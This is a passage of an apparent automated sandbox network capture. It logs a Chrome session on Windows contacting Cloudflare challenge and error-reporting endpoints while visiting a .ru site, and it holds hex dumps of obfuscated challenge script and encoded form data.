                                                            2025-01-06 15:53:50 UTC1369INData Raw: 5b 6a 47 28 37 33 39 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 6a 46 29 7b 6a 46 3d 62 2c 4f 62 6a 65 63 74 5b 6a 46 28 33 39 33 29 5d 5b 6a 46 28 31 32 39 31 29 5d 5b 6a 46 28 39 31 30 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 6a 46 28 38 31 37 29 5d 28 47 29 7d 7d 2c 67 46 3d 67 4a 28 31 33 34 31 29 5b 67 4a 28 35 36 39 29 5d 28 27 3b 27 29 2c 67 47 3d 67 46 5b 67 4a 28 31 30 34 31 29 5d 5b 67 4a 28 31 35 39 32 29 5d 28 67 46 29 2c 65 4d 5b 67 4a 28 39 38 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 6a 49 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 6a 49 3d 67 4a 2c 69 3d 7b 27 63 6e 79 45 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29
                                                            Data Ascii: [jG(739)](i,D),E),C++);return j;function s(G,H,jF){jF=b,Object[jF(393)][jF(1291)][jF(910)](j,H)||(j[H]=[]),j[H][jF(817)](G)}},gF=gJ(1341)[gJ(569)](';'),gG=gF[gJ(1041)][gJ(1592)](gF),eM[gJ(982)]=function(g,h,jI,i,j,k,l,m){for(jI=gJ,i={'cnyEo':function(n,o)
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 61 6a 58 41 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 72 63 6c 4a 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 65 57 6f 48 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 57 66 74 47 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 50 79 6c 59 54 27 3a 6a 4a 28 34 30 36 29 2c 27 7a 75 61 72 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 49 75 6c 6e 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 49 6f 6a 52 4e 27
                                                            Data Ascii: ction(h,i){return i|h},'ajXAE':function(h,i){return h&i},'rclJV':function(h,i){return i==h},'eWoHR':function(h,i){return h(i)},'WftGD':function(h,i){return i!=h},'PylYT':jJ(406),'zuarm':function(h,i){return h(i)},'Iulnz':function(h,i){return h(i)},'IojRN'
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 33 34 29 5d 28 42 5b 6a 4d 28 31 33 38 39 29 5d 2c 6a 4d 28 37 32 33 29 29 2c 54 3d 47 5b 6a 4d 28 31 31 30 35 29 5d 28 6a 4d 28 31 32 35 37 29 29 2c 54 5b 6a 4d 28 31 35 37 36 29 5d 3d 42 5b 6a 4d 28 31 31 34 31 29 5d 2c 55 3d 48 5b 6a 4d 28 31 31 30 35 29 5d 28 42 5b 6a 4d 28 31 34 30 37 29 5d 29 2c 55 5b 6a 4d 28 36 36 37 29 5d 3d 6a 4d 28 31 34 37 33 29 2c 54 5b 6a 4d 28 31 35 30 37 29 5d 28 55 29 2c 56 3d 49 5b 6a 4d 28 31 31 30 35 29 5d 28 6a 4d 28 36 30 30 29 29 2c 56 5b 6a 4d 28 31 35 37 36 29 5d 3d 42 5b 6a 4d 28 31 31 36 36 29 5d 2c 54 5b 6a 4d 28 31 35 30 37 29 5d 28 56 29 2c 57 3d 4a 5b 6a 4d 28 31 31 30 35 29 5d 28 42 5b 6a 4d 28 31 35 33 38 29 5d 29 2c 57 5b 6a 4d 28 31 30 31 30 29 5d 3d 53 2c 57 5b 6a 4d 28 31 35 37 36 29 5d 3d 42 5b 6a 4d
                                                            Data Ascii: 34)](B[jM(1389)],jM(723)),T=G[jM(1105)](jM(1257)),T[jM(1576)]=B[jM(1141)],U=H[jM(1105)](B[jM(1407)]),U[jM(667)]=jM(1473),T[jM(1507)](U),V=I[jM(1105)](jM(600)),V[jM(1576)]=B[jM(1166)],T[jM(1507)](V),W=J[jM(1105)](B[jM(1538)]),W[jM(1010)]=S,W[jM(1576)]=B[jM


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.44976835.190.80.14433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:50 UTC537OUTOPTIONS /report/v4?s=HdpIZKKqqx11o5ZVaW2tlnX59dKgCqnlnHzP4yrnJFctlnFm6CCmxAPzbb3NWKTe0e4MkC6pxUuwDvB1NxeaHuGeXHA%2FyJFM2iGDrQNYv%2FXKl%2FuquQXc2I8Fgo7fLA%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Origin: https://gimd.lamantatio.ru
                                                            Access-Control-Request-Method: POST
                                                            Access-Control-Request-Headers: content-type
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:51 UTC336INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            access-control-max-age: 86400
                                                            access-control-allow-methods: OPTIONS, POST
                                                            access-control-allow-origin: *
                                                            access-control-allow-headers: content-length, content-type
                                                            date: Mon, 06 Jan 2025 15:53:50 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.449769104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:50 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 3162
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: .wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:50 UTC3162OUTData Raw: 76 5f 38 66 64 63 65 32 31 32 38 61 64 61 34 31 66 35 3d 6a 4d 54 68 75 68 70 68 5a 68 61 68 24 30 25 32 62 77 30 2b 6d 68 30 6b 4b 62 71 4f 30 63 2b 71 6c 64 2b 73 6d 2b 6f 65 56 6f 77 4a 71 2b 4b 6b 71 62 35 56 4a 70 2b 6d 2b 54 6b 30 67 6f 57 2b 52 56 2b 62 35 31 67 68 63 35 2b 33 68 30 35 67 30 44 74 4c 6f 67 2b 32 68 74 74 39 2b 72 56 2b 5a 72 2b 54 70 2d 2b 48 4c 51 4d 71 4b 44 68 4e 6b 2b 66 2b 74 24 35 2b 64 68 4a 38 6d 2b 4e 4f 47 54 47 66 68 63 6d 63 55 31 6c 53 67 79 75 42 65 68 71 48 4a 38 70 47 70 44 56 6f 6a 6a 30 5a 63 59 74 4f 33 66 4a 67 4d 4f 6b 5a 2b 49 69 54 56 4e 79 46 6d 52 38 6a 63 6a 49 6b 52 2b 6f 6c 2b 6a 38 67 54 49 72 46 4a 2b 74 52 2b 64 49 48 4f 6a 44 42 2b 4b 49 65 36 62 6c 52 4d 62 44 4f 67 63 65 2b 4c 64 37 42 38 4e 6b 2b
                                                            Data Ascii: v_8fdce2128ada41f5=jMThuhphZhah$0%2bw0+mh0kKbqO0c+qld+sm+oeVowJq+Kkqb5VJp+m+Tk0goW+RV+b51ghc5+3h05g0DtLog+2htt9+rV+Zr+Tp-+HLQMqKDhNk+f+t$5+dhJ8m+NOGTGfhcmcU1lSgyuBehqHJ8pGpDVojj0ZcYtO3fJgMOkZ+IiTVNyFmR8jcjIkR+ol+j8gTIrFJ+tR+dIHOjDB+KIe6blRMbDOgce+Ld7B8Nk+
                                                            2025-01-06 15:53:51 UTC759INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:51 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 152876
                                                            Connection: close
                                                            cf-chl-gen: XR3KTuSIr0CdPVvcH4iip+m43ouXhtjH2j0htAC0drOfONIiPRDFYWrqngvyEdIunDjLjo1OW4hqwwYMuge10+5JqOFjMjacMXjswck/dvqhmU8Myt7p2p8QBK2wIgq+s0ZoHpk3qfFFTPXZGJo0VbnMmEoOp8dXVR+3aJ0GajiRQBGhTAUvbd1rSGhZy3regWo5XQteyeckJKvsabWf2qYFsxPYvR9LOd2o3fMpNE4wUXfvPbQnGWkITtELXRFN5gFljNPJ4BcnSi2Ebmf1yv+Ua+iOeKq2CMhcZEKJ4qaGu0L9BLpGB7rJ7v7/iHttL6WqGuUwoZbq2uPdyNPM17VtpFCxzhKHZ4spWrt/QyKEwvzg8nvUV7cx36bfJAKlOE+eX0vBdTSsGKA3+8bSVN1y5sVB4J5nXSql4iyhPYvERdlg3cK69PgGRKTdLUHPm045J8oHwPvABjTp9/hfW1aYPR3BZegsDeadGuQmPhCI04k9374WYM4VRA==$aHmvB7w5veVWlsen
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce21dfe910fa5-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:51 UTC610INData Raw: 76 4c 36 77 70 58 35 2f 68 38 43 79 6d 4c 69 6d 74 70 32 63 7a 34 79 6f 6b 63 75 55 69 4d 6a 47 72 39 58 55 79 35 6a 54 74 4a 66 4d 6e 4b 44 69 35 64 2f 6b 73 65 66 45 78 4c 71 37 78 2b 6e 72 76 71 54 71 72 2b 50 57 7a 75 44 43 36 64 4b 79 7a 2f 76 78 79 63 6e 67 30 64 48 34 34 2f 62 34 77 63 63 43 32 74 58 37 7a 4f 38 46 38 51 54 76 41 75 66 74 37 67 33 56 37 52 58 6d 48 65 37 66 43 76 4c 39 37 51 37 32 41 64 34 57 34 78 76 6e 49 65 6f 47 4b 66 72 36 41 50 30 57 47 42 55 70 47 41 6b 48 46 44 59 74 48 41 6f 4b 45 78 30 41 4d 69 67 68 42 44 59 47 48 69 6f 67 55 45 49 4d 47 6c 45 6b 54 46 4d 2f 4a 54 45 6a 4a 42 5a 50 58 55 64 57 4b 53 70 51 48 53 31 53 49 56 67 32 57 57 42 6e 62 6c 73 70 4c 55 31 71 59 55 64 68 5a 33 42 7a 5a 58 45 78 63 32 6f 2b 66 6c 59
                                                            Data Ascii: vL6wpX5/h8CymLimtp2cz4yokcuUiMjGr9XUy5jTtJfMnKDi5d/ksefExLq7x+nrvqTqr+PWzuDC6dKyz/vxycng0dH44/b4wccC2tX7zO8F8QTvAuft7g3V7RXmHe7fCvL97Q72Ad4W4xvnIeoGKfr6AP0WGBUpGAkHFDYtHAoKEx0AMighBDYGHiogUEIMGlEkTFM/JTEjJBZPXUdWKSpQHS1SIVg2WWBnblspLU1qYUdhZ3BzZXExc2o+flY
                                                            2025-01-06 15:53:51 UTC1369INData Raw: 59 2f 54 55 5a 66 62 55 6d 4d 69 57 61 4a 63 49 6c 6f 59 6e 78 33 56 4a 32 64 66 6e 35 78 66 70 64 34 65 56 35 38 6e 57 65 6a 62 4a 71 43 73 4a 69 6c 63 5a 53 51 69 6d 32 33 68 4b 39 35 70 6e 61 6d 76 71 36 71 77 4a 61 54 74 5a 65 62 67 5a 71 61 6e 61 6d 69 6d 4c 69 77 72 6f 6d 4a 79 37 2b 4c 79 4d 62 4b 30 4b 6d 30 31 4e 71 57 6c 37 69 70 6f 4c 66 59 77 65 50 67 32 39 76 56 31 2b 32 38 78 72 2f 67 38 74 37 55 71 74 62 69 73 66 66 6e 30 2b 54 64 7a 4d 75 38 7a 2f 7a 31 30 2b 58 30 38 73 50 7a 2b 64 76 6d 44 67 33 49 2b 67 6f 48 33 2b 6b 52 34 41 62 53 30 66 59 63 2b 65 72 2b 38 2f 44 78 37 68 6e 69 41 68 38 6a 49 76 73 47 38 2f 59 72 35 68 76 37 2b 51 67 69 2f 6a 50 6e 49 77 51 42 39 69 6f 48 50 41 67 72 44 41 6c 43 4d 67 39 45 4a 44 4d 55 45 55 59 36 46
                                                            Data Ascii: Y/TUZfbUmMiWaJcIloYnx3VJ2dfn5xfpd4eV58nWejbJqCsJilcZSQim23hK95pnamvq6qwJaTtZebgZqanamimLiwromJy7+LyMbK0Km01NqWl7ipoLfYwePg29vV1+28xr/g8t7Uqtbisffn0+TdzMu8z/z10+X08sPz+dvmDg3I+goH3+kR4AbS0fYc+er+8/Dx7hniAh8jIvsG8/Yr5hv7+Qgi/jPnIwQB9ioHPAgrDAlCMg9EJDMUEUY6F
                                                            2025-01-06 15:53:51 UTC1369INData Raw: 75 59 46 46 72 6a 5a 4a 58 62 35 42 72 56 34 36 56 66 34 36 63 6a 6c 35 31 70 71 56 6a 64 59 46 33 61 47 69 47 65 61 68 39 69 59 43 46 63 49 36 42 6f 49 57 52 62 59 31 34 6c 6f 69 4b 76 33 75 72 73 4c 69 64 6e 62 6d 58 77 37 54 46 6c 34 75 61 7a 63 32 6c 6d 39 4c 45 6b 71 4f 6c 73 4b 4f 31 6d 63 75 56 32 61 6d 33 74 36 32 68 30 36 44 68 73 62 2b 38 74 61 6e 62 37 75 6d 35 78 38 4b 39 73 65 50 78 31 71 37 58 38 4c 47 30 75 50 7a 73 75 4f 2f 75 38 4c 7a 34 34 2f 54 41 42 65 62 67 2b 2b 67 43 79 50 73 42 79 74 76 66 43 42 63 44 39 42 6e 77 39 67 66 57 48 42 33 65 36 74 38 50 2f 68 6f 48 45 75 55 66 46 2b 6e 38 44 77 49 4a 35 77 50 2b 43 69 6b 75 41 69 59 5a 46 54 76 37 4b 44 67 6e 43 54 34 71 41 6b 51 2f 4f 78 42 45 46 69 63 56 4b 43 67 38 44 69 68 41 51 53
                                                            Data Ascii: uYFFrjZJXb5BrV46Vf46cjl51pqVjdYF3aGiGeah9iYCFcI6BoIWRbY14loiKv3ursLidnbmXw7TFl4uazc2lm9LEkqOlsKO1mcuV2am3t62h06Dhsb+8tanb7um5x8K9sePx1q7X8LG0uPzsuO/u8Lz44/TABebg++gCyPsBytvfCBcD9Bnw9gfWHB3e6t8P/hoHEuUfF+n8DwIJ5wP+CikuAiYZFTv7KDgnCT4qAkQ/OxBEFicVKCg8DihAQS
                                                            2025-01-06 15:53:51 UTC1369INData Raw: 62 5a 46 30 58 48 79 55 6a 32 6c 78 6d 58 78 62 5a 48 74 6c 59 36 71 56 70 70 31 75 71 71 61 79 67 34 36 30 6b 33 57 6a 74 72 57 46 68 59 75 76 6c 70 74 2f 6a 70 57 37 6a 35 2f 45 6b 34 4f 41 6e 63 4f 58 75 4b 79 75 6a 62 36 6e 6e 63 61 64 77 74 6a 4c 30 61 4b 6f 33 5a 79 62 34 4e 50 4c 75 36 33 57 6f 61 2b 2b 71 4c 66 53 37 4f 50 68 37 75 62 70 38 66 44 55 37 72 36 77 31 4d 47 32 79 2b 33 54 79 63 72 4a 79 4d 48 72 77 76 58 5a 34 38 62 41 30 2f 63 41 34 67 76 47 32 77 7a 4d 36 50 49 50 44 68 4c 73 7a 75 67 44 43 75 55 49 33 66 6b 62 49 2b 73 69 38 66 6e 65 39 2f 51 48 38 76 77 47 41 53 4d 75 2f 53 55 52 41 79 73 71 44 77 55 45 39 42 73 6c 4d 54 46 41 44 42 6b 61 45 77 38 43 47 53 38 2f 4a 55 6f 31 4b 30 51 59 49 53 41 70 45 53 39 4a 52 42 34 6f 54 6a 45
                                                            Data Ascii: bZF0XHyUj2lxmXxbZHtlY6qVpp1uqqayg460k3WjtrWFhYuvlpt/jpW7j5/Ek4OAncOXuKyujb6nncadwtjL0aKo3Zyb4NPLu63Woa++qLfS7OPh7ubp8fDU7r6w1MG2y+3TycrJyMHrwvXZ48bA0/cA4gvG2wzM6PIPDhLszugDCuUI3fkbI+si8fne9/QH8vwGASMu/SURAysqDwUE9BslMTFADBkaEw8CGS8/JUo1K0QYISApES9JRB4oTjE
                                                            2025-01-06 15:53:51 UTC1369INData Raw: 58 6c 76 66 6e 43 6a 65 61 47 66 71 61 6d 6c 69 4a 74 6d 67 6f 75 42 61 59 4f 79 71 36 53 55 72 59 36 79 72 49 79 4b 65 6f 79 49 6b 5a 32 44 77 36 53 42 6b 33 36 33 70 5a 61 37 74 35 69 49 6d 4a 2f 4e 70 5a 54 55 79 4a 62 4c 30 4c 75 5a 31 61 66 57 70 37 69 67 76 74 6a 54 72 62 66 64 77 4a 2b 6c 34 4e 75 31 75 73 4b 37 30 75 6d 77 30 4c 53 7a 79 2b 44 30 39 76 58 50 39 72 76 6f 39 4d 37 78 74 64 72 6b 38 63 49 46 35 41 7a 68 42 77 37 48 32 2b 67 4a 36 4f 76 76 43 2f 49 57 46 4f 2f 55 30 77 59 50 2b 52 7a 31 2b 50 6a 62 34 2f 63 48 4a 68 58 67 49 2b 72 36 46 79 38 4f 4a 43 62 39 2b 7a 45 54 4e 43 50 77 39 68 4d 73 4c 51 6f 57 44 52 4c 38 47 77 34 74 45 68 37 35 47 67 55 6a 46 52 64 4d 43 44 67 39 52 53 6f 71 52 69 52 51 51 56 49 6b 47 43 51 39 4f 52 78 56
                                                            Data Ascii: XlvfnCjeaGfqamliJtmgouBaYOyq6SUrY6yrIyKeoyIkZ2Dw6SBk363pZa7t5iImJ/NpZTUyJbL0LuZ1afWp7igvtjTrbfdwJ+l4Nu1usK70umw0LSzy+D09vXP9rvo9M7xtdrk8cIF5AzhBw7H2+gJ6OvvC/IWFO/U0wYP+Rz1+Pjb4/cHJhXgI+r6Fy8OJCb9+zETNCPw9hMsLQoWDRL8Gw4tEh75GgUjFRdMCDg9RSoqRiRQQVIkGCQ9ORxV
                                                            2025-01-06 15:53:51 UTC1369INData Raw: 69 63 59 4a 31 71 6f 5a 71 74 6a 57 2b 77 6b 59 32 76 72 6f 75 32 6d 49 53 47 74 5a 4f 61 6b 35 71 79 77 70 50 42 76 62 6e 41 67 73 43 61 67 6f 71 62 74 72 69 35 77 61 53 64 77 61 79 55 72 38 7a 48 6f 62 48 52 74 4a 79 35 31 4d 2b 70 74 4e 6d 38 70 4d 4c 63 31 37 47 37 34 63 53 6a 71 65 54 66 75 62 37 47 76 39 62 74 74 4e 53 34 74 38 2f 6b 2b 50 72 35 30 2f 6d 35 7a 62 34 41 34 51 6a 54 2f 75 4c 43 77 39 7a 68 43 4e 76 72 45 64 2f 50 7a 4f 6b 51 34 77 59 5a 35 39 63 55 38 52 6a 72 38 79 48 76 33 78 58 79 35 79 45 41 39 50 63 6e 47 41 37 35 48 65 6f 6d 37 6a 4d 4e 38 52 49 69 38 75 77 35 4c 78 62 2b 47 54 49 43 46 78 77 62 49 6a 68 48 50 68 6f 31 4b 42 6c 49 51 6a 34 6c 4c 46 45 55 4d 56 55 74 4e 43 78 62 4f 6c 41 62 58 68 77 58 54 45 73 36 48 31 30 37 55
                                                            Data Ascii: icYJ1qoZqtjW+wkY2vrou2mISGtZOak5qywpPBvbnAgsCagoqbtri5waSdwayUr8zHobHRtJy51M+ptNm8pMLc17G74cSjqeTfub7Gv9bttNS4t8/k+Pr50/m5zb4A4QjT/uLCw9zhCNvrEd/PzOkQ4wYZ59cU8Rjr8yHv3xXy5yEA9PcnGA75Heom7jMN8RIi8uw5Lxb+GTICFxwbIjhHPho1KBlIQj4lLFEUMVUtNCxbOlAbXhwXTEs6H107U
                                                            2025-01-06 15:53:51 UTC1369INData Raw: 44 69 71 4b 78 72 72 53 47 68 35 64 79 73 49 71 6b 65 6f 75 6d 71 4d 43 59 69 70 43 52 72 72 36 41 70 4a 53 6c 6c 35 79 33 79 49 69 4f 72 63 36 4b 72 72 43 52 71 74 44 53 32 63 72 50 75 5a 71 32 30 4e 43 74 75 5a 58 6c 75 2b 47 6d 33 62 79 36 36 4e 58 56 77 75 2f 4d 73 4f 57 70 72 2b 61 78 36 63 58 51 78 4e 57 35 36 2b 62 35 79 64 66 5a 75 76 6e 56 2b 2f 4c 42 39 4e 62 6f 41 2b 50 5a 2b 2b 51 47 30 68 45 4f 30 65 4c 75 39 50 6e 51 39 75 6a 6f 45 75 2f 66 41 79 50 79 38 65 37 35 32 52 33 36 47 67 77 47 43 54 44 76 48 4f 38 55 37 67 41 76 44 44 4d 32 38 41 30 55 43 51 72 37 50 69 77 67 2f 55 41 39 49 41 4a 47 43 42 77 46 53 43 41 4c 43 77 63 4b 53 69 6b 7a 51 78 51 69 4c 31 6f 55 4d 56 4d 56 48 46 51 2f 58 6a 74 53 55 7a 78 65 55 31 52 6e 52 6a 59 6f 52 45
                                                            Data Ascii: DiqKxrrSGh5dysIqkeoumqMCYipCRrr6ApJSll5y3yIiOrc6KrrCRqtDS2crPuZq20NCtuZXlu+Gm3by66NXVwu/MsOWpr+ax6cXQxNW56+b5ydfZuvnV+/LB9NboA+PZ++QG0hEO0eLu9PnQ9ujoEu/fAyPy8e752R36GgwGCTDvHO8U7gAvDDM28A0UCQr7Piwg/UA9IAJGCBwFSCALCwcKSikzQxQiL1oUMVMVHFQ/XjtSUzxeU1RnRjYoRE
                                                            2025-01-06 15:53:51 UTC1369INData Raw: 73 49 79 54 6f 4b 57 76 74 34 2b 32 6e 62 79 56 72 62 65 36 66 61 4b 56 6f 72 75 59 71 4d 75 31 69 36 66 51 6a 38 57 52 69 35 4c 4d 79 62 43 6b 6c 62 4f 54 78 36 79 37 34 4d 48 69 71 39 2b 34 6e 71 53 2b 74 39 54 63 70 64 37 4a 71 36 72 48 72 65 37 4b 77 72 2f 45 36 65 72 74 32 72 72 51 39 66 71 33 37 74 44 71 38 63 33 69 33 4e 30 44 78 4d 6a 57 31 77 6a 48 42 2b 49 45 42 76 50 4d 44 67 37 52 42 52 4c 6f 39 65 67 4a 2b 76 30 4f 2f 67 73 56 47 67 66 37 2f 53 50 79 43 50 55 71 4a 51 55 73 37 41 50 76 44 41 6f 55 43 69 51 72 39 50 4d 73 44 44 55 4f 39 79 41 32 45 54 49 42 4f 43 49 68 43 55 6f 38 48 77 6c 41 50 43 6f 76 51 55 59 6b 50 69 39 41 51 7a 4d 4d 51 7a 73 38 4f 6b 35 62 4c 6d 4e 57 48 55 56 56 50 6a 38 34 56 56 30 70 56 30 31 69 58 6b 56 4d 63 56 35
                                                            Data Ascii: sIyToKWvt4+2nbyVrbe6faKVoruYqMu1i6fQj8WRi5LMybCklbOTx6y74MHiq9+4nqS+t9Tcpd7Jq6rHre7Kwr/E6ert2rrQ9fq37tDq8c3i3N0DxMjW1wjHB+IEBvPMDg7RBRLo9egJ+v0O/gsVGgf7/SPyCPUqJQUs7APvDAoUCiQr9PMsDDUO9yA2ETIBOCIhCUo8HwlAPCovQUYkPi9AQzMMQzs8Ok5bLmNWHUVVPj84VV0pV01iXkVMcV5
                                                            2025-01-06 15:53:51 UTC1369INData Raw: 33 6d 72 70 72 6d 4a 6c 35 6d 4e 67 62 4e 2f 77 5a 47 66 6e 70 57 4a 75 38 2b 73 77 34 4f 53 31 4b 43 39 74 73 32 6b 70 61 65 6c 73 35 6e 56 7a 73 69 2b 74 39 69 78 6f 72 37 59 32 4c 58 42 75 4d 32 6f 78 72 6d 74 76 63 6e 41 36 37 44 4f 77 4c 58 46 30 61 33 39 30 2f 6d 2b 39 64 54 53 41 65 33 74 32 67 6a 6b 79 50 33 58 77 39 30 43 2b 4f 2f 39 43 73 30 52 37 75 6a 6b 39 66 62 6d 45 66 7a 6e 43 78 6f 58 41 2f 54 38 33 50 4d 64 4a 79 51 6f 4a 77 59 5a 4b 66 6f 4d 36 41 6f 4a 36 79 6a 6e 37 44 6e 77 4c 51 6f 57 43 50 6e 36 46 44 34 57 49 51 4d 53 45 44 52 41 4e 6a 38 33 47 45 6f 6c 54 67 35 46 4a 31 4d 31 4d 30 31 54 51 44 67 37 54 45 5a 4f 46 31 46 4b 58 56 31 68 48 78 31 47 5a 31 74 6b 4b 6a 4e 48 57 47 45 38 53 6a 77 75 59 55 68 79 53 6c 55 33 62 45 52 6f
                                                            Data Ascii: 3mrprmJl5mNgbN/wZGfnpWJu8+sw4OS1KC9ts2kpaels5nVzsi+t9ixor7Y2LXBuM2oxrmtvcnA67DOwLXF0a390/m+9dTSAe3t2gjkyP3Xw90C+O/9Cs0R7ujk9fbmEfznCxoXA/T83PMdJyQoJwYZKfoM6AoJ6yjn7DnwLQoWCPn6FD4WIQMSEDRANj83GEolTg5FJ1M1M01TQDg7TEZOF1FKXV1hHx1GZ1tkKjNHWGE8SjwuYUhySlU3bERo


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.44977035.190.80.14433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:51 UTC476OUTPOST /report/v4?s=HdpIZKKqqx11o5ZVaW2tlnX59dKgCqnlnHzP4yrnJFctlnFm6CCmxAPzbb3NWKTe0e4MkC6pxUuwDvB1NxeaHuGeXHA%2FyJFM2iGDrQNYv%2FXKl%2FuquQXc2I8Fgo7fLA%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 429
                                                            Content-Type: application/reports+json
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:51 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 6d 64 2e 6c 61 6d 61 6e 74 61 74 69 6f 2e 72 75 2f 5a 53 65 69 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 33 32 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":108,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://gimd.lamantatio.ru/ZSei/","sampling_fraction":1.0,"server_ip":"104.21.32.1","status_code":404,"type":"http.error"},"type":"network-error","
                                                            2025-01-06 15:53:51 UTC168INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            date: Mon, 06 Jan 2025 15:53:51 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.449771104.18.95.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
